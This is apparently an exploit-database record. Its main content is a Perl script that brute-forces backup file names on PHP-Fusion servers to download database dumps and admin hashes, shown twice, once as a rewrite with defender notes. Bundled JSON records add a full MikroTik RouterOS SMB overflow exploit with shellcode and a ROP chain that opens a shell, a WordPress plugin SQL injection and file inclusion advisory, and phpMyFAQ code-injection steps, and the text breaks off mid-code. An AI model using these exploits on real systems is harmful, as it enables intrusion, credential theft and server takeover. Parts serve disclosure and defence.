ID 1337DAY-ID-139
Type zdt
Reporter Easyex
Modified 2005-06-25T00:00:00
Description
Exploit for unknown platform in category web applications
===================================================================
PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit
===================================================================
#!/usr/bin/perl
######################################################
# D A R K A S S A S S I N S C R E W 2 0 0 5 #
######################################################
# Dark Assassins - http://dark-assassins.com/ #
# Visit us on IRC @ irc.tddirc.net #DarkAssassins #
######################################################
# phpfusiondb.pl; Version 0.1 22/06/05 #
# PHP-Fusion db backup proof-of-concept by Easyex #
# Database backup vuln in v6.00.105 and below #
######################################################
# Description: When a db (database) backup is made #
# it is saved in /administration/db_backups/ on 6.0 #
# and on 5.0 it is saved in /fusion_admin/db_backups/#
# The backup file can be saved in 2 formats: .sql or #
# .sql.gz and is hidden by a blank index.php file but#
# can be downloaded client-side, The filename is for #
# example : backup_2005-06-22_2208.sql.gz so what we #
# can do is generate 0001 to 9999 and request the #
# file and download it. If a db file is found an #
# attacker can get the admin hash and crack it or #
# retrieve other sensitive information from the db! #
######################################################
# 9999 requests to the host is a lot, and would get noticed in the server log!
# If you re-coded your own script with proxy support you would be fine.
# You need to know the backup year-month-day to be able to find a backup file unless the server is set to automatically
# back up the PHP-Fusion database.
# Flat script; behaviour is the original's: print usage when fewer than four
# arguments are given, otherwise issue 9999 sequential wget calls for
# <host><dir><file>NNNN<extension> with NNNN running 0000..9998.
#
# Defender notes (the script adds no capability beyond a predictable GET loop):
#   - It only works when the backup directory is served over HTTP. A blank
#     index.php hides directory listings but does not deny a known file name;
#     keep backups outside the document root or deny the directory in the web
#     server configuration.
#   - Each guess is one request to a predictable path, so a run leaves a dense,
#     sequential 404 pattern from one client in the access log, which is easy
#     to alert on (the header comment above says as much).
#   - `system` with an interpolated string goes through the shell, and every
#     piece of $target comes unvalidated from @ARGV; shell metacharacters in an
#     argument are executed locally. Kept as-is for behaviour parity; the list
#     form `system($wget, $target)` would avoid the shell.
my $wget   = 'wget';
my $target;
my $dir;    # the original left this as an implicit package global

# Banner printed both in the usage path and before the request loop.
sub _banner_lines {
    return (
        "\n",
        "Welcome to the PHP-Fusion db backup vulnerability\n",
        "Coded by Easyex from the Dark Assassins crew\n",
        "\n",
    );
}

unless (@ARGV >= 4) {
    print _banner_lines();
    print "Usage: phpfusiondb.pl <host> <version> <file> <extension>\n";
    print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";
    print "\n";
    exit();
}

my ($host, $ver, $file, $extension) = @ARGV[0 .. 3];

# Backup folder per major version, as documented in the header comment.
# Any other $ver leaves $dir undefined, exactly as the original did.
my %backup_dir_for = (
    '6' => '/administration/db_backups/',   # 6.X backup folder
    '5' => '/fusion_admin/db_backups/',     # 5.X backup folder
);
$dir = $backup_dir_for{$ver} if exists $backup_dir_for{$ver};

print _banner_lines();
print "Host: $host\n";
print "Directory: $dir\n";
print "File: $file + 0001 to 9999\n";   # NB: the loop below actually tries 0000..9998
print "Extension: $extension\n";
print "\n";
print "Attempting to find a db backup file on $host\n";

# 0 .. 9998 matches the original C-style loop ($count < 9999).
for my $suffix (0 .. 9998) {
    $target = join '', $host, $dir, $file, sprintf('%04d', $suffix), $extension;
    system("$wget $target");
}
{"id": "1337DAY-ID-139", "bulletinFamily": "exploit", "title": "PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit", "description": "Exploit for unknown platform in category web applications", "published": "2005-06-25T00:00:00", "modified": "2005-06-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/139", "reporter": "Easyex", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-03T03:35:12", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:45:32", "value": 3.6}}, "hash": "68e8a2f5104f0ac2be2b4e5edd838a770eb0646ced1f5c30d885c7e9cb8c925f", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f872c457a848a124d8dbcf4abd1d80a0", "key": "href"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "109c4f038ba21f3bb58a7da692cdd0b3", "key": "sourceHref"}, {"hash": "15decd73b99156076f1cf7fbfc3abf1d", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "83eeb8711945913fc013f598f200302e", "key": "sourceData"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "9242e54907efdcfe3eb4cac572fafd96", "key": "title"}, {"hash": "bc044d4bec3f06d876cf902f1748d6b4", "key": "reporter"}], "history": [], "href": "http://0day.today/exploit/description/139", "id": "1337DAY-ID-139", "lastseen": "2016-04-20T01:45:32", "modified": "2005-06-25T00:00:00", "objectVersion": "1.0", "published": "2005-06-25T00:00:00", "references": [], "reporter": "Easyex", "sourceData": 
"===================================================================\r\nPHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit\r\n===================================================================\r\n\r\n\r\n\r\n\r\n\r\n #!/usr/bin/perl\r\n ######################################################\r\n # D A R K A S S A S S I N S C R E W 2 0 0 5 #\r\n ######################################################\r\n # Dark Assassins - http://dark-assassins.com/ #\r\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins #\r\n ######################################################\r\n # phpfusiondb.pl; Version 0.1 22/06/05 #\r\n # PHP-Fusion db backup proof-of-concept by Easyex #\r\n # Database backup vuln in v6.00.105 and below #\r\n ######################################################\r\n # Description: When a db (database) backup is made #\r\n # it is saved in /administration/db_backups/ on 6.0 #\r\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\r\n # The backup file can be saved in 2 formats: .sql or #\r\n # .sql.gz and is hidden by a blank index.php file but#\r\n # can be downloaded client-side, The filename is for #\r\n # example : backup_2005-06-22_2208.sql.gz so what we #\r\n # can do is generate 0001 to 9999 and request the #\r\n # file and download it. If a db file is found an #\r\n # attacker can get the admin hash and crack it or #\r\n # retrieve other sensitive information from the db! 
#\r\n ######################################################\r\n\r\n # 9999 requests to the host is alot, And would get noticed in the server log!\r\n # If you re-coded your own script with proxy support you would be fine.\r\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly \r\n # backup the php-fusiondatabase.\r\n\r\n my $wget='wget';\r\n\r\n my $count='0';\r\n\r\n my $target;\r\n\r\n if (@ARGV < 4)\r\n{\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\r\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\r\n print \"\\n\";\r\n exit();\r\n}\r\n\r\n my $host = $ARGV[0];\r\n my $ver = $ARGV[1];\r\n my $file = $ARGV[2];\r\n my $extension = $ARGV[3];\r\n\r\n if ($ver eq \"6\") {\r\n $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\r\n }\r\n\r\n if ($ver eq \"5\") {\r\n $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\r\n}\r\n\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n\r\n print \"Host: $host\\n\";\r\n print \"Directory: $dir\\n\";\r\n print \"File: $file + 0001 to 9999\\n\";\r\n print \"Extension: $extension\\n\";\r\n print \"\\n\";\r\n print \"Attempting to find a db backup file on $host\\n\";\r\n\r\n for($count=0;$count<9999;$count++) {\r\n\r\n $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\r\n\r\n system(\"$wget $target\");\r\n }\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/139", "title": "PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit", "type": "zdt", "viewCount": 106}, "differentElements": ["sourceHref", 
"sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:45:32"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "bca49b87b47130c26393f7e65537e693"}, {"key": "modified", "hash": "15decd73b99156076f1cf7fbfc3abf1d"}, {"key": "published", "hash": "15decd73b99156076f1cf7fbfc3abf1d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bc044d4bec3f06d876cf902f1748d6b4"}, {"key": "sourceData", "hash": "1ef4229e749c4c601dbc29d884b994d5"}, {"key": "sourceHref", "hash": "b6f80cb0d5f1cd629592c4a17e97db2d"}, {"key": "title", "hash": "9242e54907efdcfe3eb4cac572fafd96"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "eb16723f511ed13c0978e52c0b7539dd42a479eb2ae75a4922ff06def2c7dd78", "viewCount": 106, "enchantments": {"vulnersScore": 2.8}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/139", "sourceData": "===================================================================\r\nPHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit\r\n===================================================================\r\n\r\n\r\n\r\n\r\n\r\n #!/usr/bin/perl\r\n ######################################################\r\n # D A R K A S S A S S I N S C R E W 2 0 0 5 #\r\n ######################################################\r\n # Dark Assassins - http://dark-assassins.com/ #\r\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins #\r\n ######################################################\r\n # phpfusiondb.pl; Version 0.1 22/06/05 #\r\n # PHP-Fusion db backup proof-of-concept by Easyex #\r\n # Database backup vuln in v6.00.105 and below #\r\n ######################################################\r\n # Description: When a db 
(database) backup is made #\r\n # it is saved in /administration/db_backups/ on 6.0 #\r\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\r\n # The backup file can be saved in 2 formats: .sql or #\r\n # .sql.gz and is hidden by a blank index.php file but#\r\n # can be downloaded client-side, The filename is for #\r\n # example : backup_2005-06-22_2208.sql.gz so what we #\r\n # can do is generate 0001 to 9999 and request the #\r\n # file and download it. If a db file is found an #\r\n # attacker can get the admin hash and crack it or #\r\n # retrieve other sensitive information from the db! #\r\n ######################################################\r\n\r\n # 9999 requests to the host is alot, And would get noticed in the server log!\r\n # If you re-coded your own script with proxy support you would be fine.\r\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly \r\n # backup the php-fusiondatabase.\r\n\r\n my $wget='wget';\r\n\r\n my $count='0';\r\n\r\n my $target;\r\n\r\n if (@ARGV < 4)\r\n{\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\r\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\r\n print \"\\n\";\r\n exit();\r\n}\r\n\r\n my $host = $ARGV[0];\r\n my $ver = $ARGV[1];\r\n my $file = $ARGV[2];\r\n my $extension = $ARGV[3];\r\n\r\n if ($ver eq \"6\") {\r\n $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\r\n }\r\n\r\n if ($ver eq \"5\") {\r\n $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\r\n}\r\n\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n\r\n print \"Host: $host\\n\";\r\n 
print \"Directory: $dir\\n\";\r\n print \"File: $file + 0001 to 9999\\n\";\r\n print \"Extension: $extension\\n\";\r\n print \"\\n\";\r\n print \"Attempting to find a db backup file on $host\\n\";\r\n\r\n for($count=0;$count<9999;$count++) {\r\n\r\n $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\r\n\r\n system(\"$wget $target\");\r\n }\r\n\r\n\r\n\n# 0day.today [2018-03-03] #"}
{"result": {"zdt": [{"lastseen": "2018-03-20T01:19:38", "references": [], "description": "Exploit for hardware platform in category remote exploits", "edition": 1, "reporter": "CoreLabs", "published": "2018-03-16T00:00:00", "title": "MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-20T01:19:38", "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N/", "value": 3.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7445"], "modified": "2018-03-16T00:00:00", "id": "1337DAY-ID-29995", "href": "https://0day.today/exploit/description/29995", "sourceData": "#!/usr/bin/env python\r\n \r\nimport socket\r\nimport struct\r\nimport sys\r\nimport telnetlib\r\n \r\nNETBIOS_SESSION_MESSAGE = \"\\x00\"\r\nNETBIOS_SESSION_REQUEST = \"\\x81\"\r\nNETBIOS_SESSION_FLAGS = \"\\x00\"\r\n \r\n# trick from http://shell-storm.org/shellcode/files/shellcode-881.php\r\n# will place the socket file descriptor in eax\r\nfind_sock_fd = \"\\x6a\\x02\\x5b\\x6a\\x29\\x58\\xcd\\x80\\x48\"\r\n \r\n# dup stdin-stdout-stderr so we can reuse the existing connection\r\ndup_fds = \"\\x89\\xc3\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\"\r\n \r\n# execve - cannot pass the 2nd arg as NULL or busybox will complain\r\nexecve_bin_sh = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n \r\n# build shellcode\r\nshellcode = find_sock_fd + dup_fds + execve_bin_sh\r\n \r\n# rop to mprotect and make the heap executable\r\n# the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it\r\np = lambda x : struct.pack('I', x)\r\n \r\nrop = \"\"\r\nrop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret; \r\nrop += p(0x08072000) # ebx -> heap base\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret; \r\nrop += p(0x14000) # ecx -> size for mprotect\r\nrop += p(0x08066f24) # 0x08066f24: pop 
edx; pop edi; pop ebp; ret; \r\nrop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC\r\nrop += p(0xffffffff) # edi -> gibberish\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; \r\nrop += p(0x0000007d) # ebp -> mprotect system call\r\nrop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret; \r\nrop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR\r\nrop += p(0xffffffff) # ebp -> gibberish\r\nrop += p(0x0) # edx -> zeroed out\r\nrop += p(0x0) # ecx -> zeroed out\r\nrop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; \r\nrop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data\r\nrop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;\r\nrop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap\r\n \r\noffset_to_regs = 83\r\n \r\n# we do not really care about the initial register values other than overwriting the saved ret address\r\nebx = p(0x45454545)\r\nesi = p(0x45454545)\r\nedi = p(0x45454545)\r\nebp = p(0x45454545)\r\neip = p(0x0804886c) # 0x0804886c: ret;\r\n \r\npayload = \"\\xff\" * offset_to_regs + ebx + esi + edi + ebp + eip + rop\r\nheader = struct.pack(\"!ccH\", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload))\r\nbuf = header + payload\r\n \r\ndef open_connection(ip):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((ip, 139))\r\n return s\r\n \r\ndef store_payload(s):\r\n print \"[+] storing payload on the heap\"\r\n s.send((NETBIOS_SESSION_MESSAGE + \"\\x00\\xeb\\x02\") * 4000 + \"\\x90\" * 16 + shellcode)\r\n \r\ndef crash_smb(s):\r\n print \"[+] getting code execution\"\r\n s.send(buf)\r\n \r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 2:\r\n print \"%s ip\" % sys.argv[0]\r\n sys.exit(1)\r\n \r\n s = open_connection(sys.argv[1])\r\n store_payload(s)\r\n \r\n # the server closes the first connection, so we need to 
open another one\r\n t = telnetlib.Telnet()\r\n t.sock = open_connection(sys.argv[1])\r\n crash_smb(t.sock)\r\n print \"[+] got shell?\"\r\n t.interact()\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29995"}, {"lastseen": "2018-01-03T19:12:22", "references": [], "description": "WordPress Booking Calendar plugin versions 7.1, 7.0, and below suffer from remote SQL injection and local file inclusion vulnerabilities.", "edition": 1, "reporter": "Neven Biruski", "published": "2017-12-20T00:00:00", "title": "WordPress Booking Calendar 7.0 / 7.1 SQL Injection / Local File Inclusion Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-03T19:12:22", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-12-20T00:00:00", "id": "1337DAY-ID-29275", "href": "https://0day.today/exploit/description/29275", "sourceData": "Advisory Title: WordPress Booking Calendar Plugin Multiple Vulnerabilities\r\nAdvisory URL: http://www.defensecode.com/advisories.php\r\nSoftware: WordPress Booking Calendar plugin\r\nLanguage: PHP\r\nVersion: 7.0/7.1 and below\r\nVendor Status: Vendor contacted, updates released\r\nRelease Date: 2017/12/13\r\nRisk: Medium\r\n\r\n\r\n\r\n1. General Overview\r\n===================\r\nDuring the security audit of Booking Calendar plugin for WordPress\r\nCMS, multiple vulnerabilities were discovered using DefenseCode\r\nThunderScan application source code security analysis platform.\r\n\r\nMore information about ThunderScan is available at URL:\r\nhttp://www.defensecode.com\r\n\r\n\r\n2. 
Software Overview\r\n====================\r\nBooking Calendar plugin - described by the authors as the ultimate\r\nbooking system for online reservation and availability checking\r\nservice for your site.\r\n\r\nAccording to wordpress.org, it has more than 40,000 active installs.\r\n\r\nHomepage:\r\nhttps://wordpress.org/plugins/booking/\r\nhttp://wpbookingcalendar.com/\r\nhttps://wordpress.org/plugins/booking/#developers\r\n\r\n\r\n3. Vulnerability Description\r\n============================\r\nDuring the security analysis, ThunderScan discovered SQL injection and\r\nLocal file inclusion vulnerabilities in Booking Calendar WordPress\r\nplugin.\r\n\r\nThe easiest way to reproduce the SQL injection vulnerabilities is to\r\nsend the specified parameter to the provided URL while being logged in\r\nas administrator or another user that is authorized to access the\r\nplugin settings page. Users that do not have full administrative\r\nprivileges could abuse the database access the vulnerabilities provide\r\nto either escalate their privileges or obtain and modify database\r\ncontents they were not supposed to be able to.\r\n\r\nBy requesting a specially crafted URL, the attacker can cause remote\r\nserver to execute a php file of his choosing. Although the user\r\nrequesting the URL has to be logged into the WordPress administrative\r\nconsole, the attacker can cause the administrator to request such a\r\nURL by using various social engineering/phishing approaches. Specified\r\nfile will be interpreted by php interpreter, and any valid php code\r\nwill indeed be executed. If the php installation on server has\r\n\"allow_url_include=1\" configuration option set, this attack can be\r\nexpanded to execute a php file from any remote URL. 
If the php version\r\nis less than 5.3.4, the \".php\" that gets appended to the end of the\r\nfile name attacker chose can be omitted by adding a null character\r\n(\"%00\") to the requested URL, and enable the attacker to execute any\r\nfile, regardless of the extension.\r\n\r\nDue to the CSRF token needed to perform the attack the risk is lowered\r\nto medium.\r\n\r\n3.1. SQL injection\r\n Function: $wpdb->query()\r\n Variable: $_POST[ \"booking_id\" ];\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n File: booking\\lib\\wpbc-ajax.php\r\n ---------\r\n 152 $booking_id = $_POST[ \"booking_id\" ];\r\n 153 $approved_id = explode('|',$booking_id);\r\n ...\r\n 162 $approved_id_str = join( ',', $approved_id);\r\n ...\r\n 165 if ( false === $wpdb->query( $wpdb->prepare( \"UPDATE\r\n{$wpdb->prefix}bookingdates SET approved = %s WHERE booking_id IN\r\n({$approved_id_str})\", $is_approve_or_pending ) ) ){ \r\n ---------\r\n \r\n3.2. SQL injection\r\n Function: $wpdb->query()\r\n Variable: $_POST[ \"booking_id\" ];\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n Vulnerable code snippets:\r\n File: booking\\lib\\wpbc-ajax.php\r\n ---------\r\n 110 $id_of_new_bookings = $_POST[ \"booking_id\" ];\r\n 111 $arrayof_bookings_id = explode('|',$id_of_new_bookings);\r\n ...\r\n 114 wpbc_update_number_new_bookings( $arrayof_bookings_id,\r\n$is_new , $user_id );\r\n ---------\r\n File: booking\\lib\\wpdev-booking-functions.php\r\n ---------\r\n 1468 function wpbc_update_number_new_bookings(\r\n$id_of_new_bookings, $is_new = '0' , $user_id = 1 ){\r\n ...\r\n 1485 $update_sql = \"UPDATE {$wpdb->prefix}booking AS bk SET\r\nbk.is_new = {$is_new} WHERE bk.booking_id IN ( {$id_of_new_bookings} ) \";\r\n ...\r\n 1487 if ( false === $wpdb->query( $update_sql ) ) {\r\n ---------\r\n\r\n3.3 PHP file inclusion\r\n Function: include()\r\n Variable: $_POST['captcha_chalange']\r\n Vulnerable URL: /wp-admin/admin-ajax.php\r\n Vulnerable code snippets:\r\n File: 
booking\\core\\lib\\wpbc-booking-new.php\r\n ---------\r\n 127 if (! wpbc_check_CAPTCHA( $_POST['captcha_user_input'],\r\n$_POST['captcha_chalange'], $bktype ) ) {\r\n ...\r\n 19 function wpbc_check_CAPTCHA( $the_answer_from_respondent,\r\n$prefix, $bktype ) {\r\n ...\r\n 23 $correct = $captcha_instance->check($prefix,\r\n$the_answer_from_respondent);\r\n ---------\r\n File: wp-content\\plugins\\booking\\js\\captcha\\captcha.php\r\n ---------\r\n 139 function check( $prefix, $response ) {\r\n ...\r\n 141 include( $this->tmp_dir . $prefix . '.php' );\r\n ---------\r\n \r\n\r\n4. Solution\r\n===========\r\nVendor resolved the security issues. All users are strongly advised to\r\nupdate WordPress Booking Calendar plugin to the latest available\r\nversion.\r\n\r\n\r\n5. Credits\r\n==========\r\nDiscovered by Neven Biruski using DefenseCode ThunderScan source code\r\nsecurity analyzer.\r\n\r\n \r\n6. Disclosure Timeline\r\n======================\r\n2016/11/15 Vulnerabilities discovered\r\n2017/04/04 Vendor contacted\r\n2017/04/04 Vendor responded - 7.0 already fixed SQL injection vulns\r\n2017/04/04 Update released for LFI (7.1)\r\n2017/12/13 Advisory released to the public\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29275"}, {"lastseen": "2018-01-10T05:11:37", "references": [], "description": "phpMyFAQ version 2.9.9 suffers from an issue where an administrative account can execute arbitrary code on the server by modifying LANG_CONF[main.metaDescription].", "edition": 1, "reporter": "tomplixsee", "published": "2017-11-19T00:00:00", "title": "phpMyFAQ 2.9.9 Code Injection Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-10T05:11:37", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:P/", "value": 5.4}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-11-19T00:00:00", "id": "1337DAY-ID-29018", "href": "https://0day.today/exploit/description/29018", "sourceData": "# Exploit 
Title: [PHPMYFAQ 2.9.9 Code Injection]\r\n# Google Dork: [NA]\r\n# Date: [Nov 6 2017]\r\n# Exploit Author: [tomplixsee]\r\n# Author blog : [cupuzone.wordpress.com]\r\n# Vendor Homepage: [ http://www.phpmyfaq.de]\r\n# Software Link: [http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip]\r\n# Version: [2.9.9] \r\n# Tested on: [Ubuntu Server 16.04, PHP 7.0.22]\r\n# CVE : [NA]\r\n\r\n\r\nHow to reproduce\r\n1. login to administrative page (example http://vbox-ubuntu-server.me/phpmyfaq/admin/ ) as an admin or any user with right access to edit translation\r\n2. open page configuration->interface translation (assume you use english language). fyi, edit translations only active if folder phpmyfaq/lang is writable, so make sure the folder is writable\r\n3. choose indonesia (or another language) to edit\r\n4. choose page 14 (in example)\r\n5. choose variable LANG_CONF[main.metaDescription]\r\n6. set phpinfo() as value\r\n7. change your languge to indonesia\r\n\r\n\r\nvulnerable code\r\non file admin/ajax.trans.php\r\n\r\n 43 case 'save_page_buffer':\r\n 44 /*\r\n 45 * Build language variable definitions\r\n 46 * @todo Change input handling using PMF_Filter\r\n 47 */\r\n 48 foreach ((array) @$_POST['PMF_LANG'] as $key => $val) {\r\n 49 if (is_string($val)) {\r\n 50 $val = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val);\r\n 51 $val = str_replace(\"'\", \"\\\\'\", $val);\r\n 52 $_SESSION['trans']['rightVarsOnly'][\"PMF_LANG[$key]\"] = $val;\r\n 53 } elseif (is_array($val)) {\r\n 54 /*\r\n 55 * Here we deal with a two dimensional array\r\n 56 */\r\n 57 foreach ($val as $key2 => $val2) {\r\n 58 $val2 = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val2);\r\n 59 $val2 = str_replace(\"'\", \"\\\\'\", $val2);\r\n 60 $_SESSION['trans']['rightVarsOnly'][\"PMF_LANG[$key][$key2]\"] = $val2;\r\n 61 }\r\n 62 }\r\n 63 }\r\n 64 \r\n 65 foreach ((array) @$_POST['LANG_CONF'] as $key => $val) {\r\n 66 // if string like 
array(blah-blah-blah), extract the contents inside the brackets\r\n 67 if (preg_match('/^\\s*array\\s*\\(\\s*(\\d+.+)\\s*\\).*$/', $val, $matches1)) {\r\n 68 // split the resulting string of delimiters such as \"number =>\"\r\n 69 $valArr = preg_split(\r\n 70 '/\\s*(\\d+)\\s*\\=\\>\\s*/',\r\n 71 $matches1[1],\r\n 72 null,\r\n 73 PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY\r\n 74 );\r\n 75 $numVal = count($valArr);\r\n 76 if ($numVal > 1) {\r\n 77 $newValArr = [];\r\n 78 for ($i = 0; $i < $numVal; $i += 2) {\r\n 79 if (is_numeric($valArr[$i])) {\r\n 80 // clearing quotes\r\n 81 if (preg_match('/^\\s*\\\\\\\\*[\\\"|\\'](.+)\\\\\\\\*[\\\"|\\'][\\s\\,]*$/', $valArr[$i + 1], $matches2)) {\r\n 82 $subVal = $matches2[1];\r\n 83 // normalize quotes\r\n 84 $subVal = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $subVal);\r\n 85 $subVal = str_replace(\"'\", \"\\\\'\", $subVal);\r\n 86 // assembly of the original substring back\r\n 87 $newValArr[] = $valArr[$i].' => \\''.$subVal.'\\'';\r\n 88 }\r\n 89 }\r\n 90 }\r\n 91 $_SESSION['trans']['rightVarsOnly'][\"LANG_CONF[$key]\"] = 'array('.implode(', ', $newValArr).')';\r\n 92 }\r\n 93 } else { // compatibility for old behavior\r\n 94 $val = str_replace(array('\\\\\\\\', '\\\"', '\\\\\\''), array('\\\\', '\"', \"'\"), $val);\r\n 95 $val = str_replace(\"'\", \"\\\\'\", $val);\r\n 96 $_SESSION['trans']['rightVarsOnly'][\"LANG_CONF[$key]\"] = $val;\r\n 97 }\r\n 98 }\r\n 99 \r\n 100 echo 1;\r\n 101 break;\r\n 102 \r\n 103 case 'save_translated_lang':\r\n 104 \r\n 105 if (!$user->perm->checkRight($user->getUserId(), 'edittranslation')) {\r\n 106 echo $PMF_LANG['err_NotAuth'];\r\n 107 exit;\r\n 108 }\r\n 109 \r\n 110 $lang = strtolower($_SESSION['trans']['rightVarsOnly']['PMF_LANG[metaLanguage]']);\r\n 111 $filename = PMF_ROOT_DIR.'/lang/language_'.$lang.'.php';\r\n 112 \r\n 113 if (!is_writable(PMF_ROOT_DIR.'/lang')) {\r\n 114 echo 0;\r\n 115 exit;\r\n 116 }\r\n 117 \r\n 118 if (!copy($filename, 
